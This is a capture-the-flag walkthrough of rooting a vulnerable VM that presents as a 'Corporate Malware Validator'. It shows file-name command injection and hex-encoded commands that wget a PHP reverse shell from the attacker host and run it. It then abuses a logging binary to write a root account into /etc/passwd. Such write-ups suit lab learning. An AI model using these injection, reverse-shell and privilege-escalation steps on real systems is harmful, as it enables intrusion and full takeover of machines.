The objective is to get root privileges and get the flag. Downloaded and fired up, it presents with a login screen with no other information at all apart from telling us that it is a Corporate Malware Validator:
So, heading back to our attacking machine, Kali 2017.1, I run a simple command: $ nmap 172.16.92.0/24
Now that we know the IP address of our target machine, let’s start by scanning it and see if we can get anything else:
For this case, I am using Zenmap, a GUI version of Nmap. The scan shows us that there are 2 ports open:
Port 22 – Used for SSH Port 80 – Used to serve a web application
Let’s head to its port 80 and see what’s the web application we are dealing with:
On uploading a random file, I get the following message:
On uploading the right file type (application/x-executable, application/x-sharedlib formats supported) which was a sample C program I whipped up, I got the following on uploading it:
Looking at the output, it is clear that the system is running strings and objdump commands on the uploaded files. After doing some more research, I found out that ‘.‘ Moreover, ‘/‘ do not work. This made me wonder whether I will be able to exploit it using RCE (Remote Code Execution). I thought to test it out with a basic Linux command. To do that, I used Burp Suite and added the command id; after the file name that I was uploading:
and forwarded the request:
Now I know that RCE will work. Now, time to add a shell. I used a PHP-reverse-shell. However, we cannot upload the shell directly. I tried converting the commands into HEX and sent them the same way I sent the earlier commands. I’ll be using the following format to send the request: Echo HEX_CODE | xxd -r -p And I’ll be converting the following commands into HEX: wget http://172.16.92.141/shell.txt -O /tmp/shell.php php /tmp/shell.php; and their final code converts to be: echo 7767657420687474703a2f2f3137322e31362e39322e3134312f7368656c6c2e747874202d4f202f746d702f7368656c6c2e706870 | xxd -r -p echo 706870202F746D702F7368656C6C792E7068703B | xxd -r -p I appended both commands the same way I appended the id command earlier and after running the second command, I got a reverse shell:
After digging for a little while, I came across a file called admin_login_logger and admin_login_request.js Since I did not want to go back to the web application, I started to play around the first file. After playing it with on my system, I realized that the file creates a new file at /var/log/proteus/log with the parameter we pass. For a long time, I played around with it, giving it various kinds of parameters, until, I entered a long parameter which crashed the file. To create that, I used a tool called pattern.py which can be found at https://raw.githubusercontent.com/Svenito/exploit-pattern/master/pattern.py I ran the following command: $ ./admin_login_logger ‘pattern.py 1024’
This made the file crash. After inspecting, I saw that a file was created in my current directory with the name first few characters of the string passed which made me wonder if I can figure out the extent of characters the file can take and use that to create a user on the target machine. Upon running the following command: $ pattern.py Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0A I saw that it told me the first occurrence was at position 456. Time to exploit this: To add a user, I need a password to enter in /etc/passwd
So, I added the following in /etc/passwd: Chiragh: $1$.T8Oa/jC$BSMBICcTHivnsn3RAXO6N/…:0:0::/tmp Time to run the exploit: $ ./admin_login_logger ‘chiragh:$1$.T8Oa/jC$BSMBICcTHivnsn3RAXO6N/…:0:0::/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/etc/passwd’ Followed by: $ su chiragh And we are root!!
The flag is a PNG image which can be found at /root. I uploaded the image and served a PHP server. The following links can help understand few ways we used to crack the target machine: http://www.unit-conversion.info/texttools/hexadecimal/
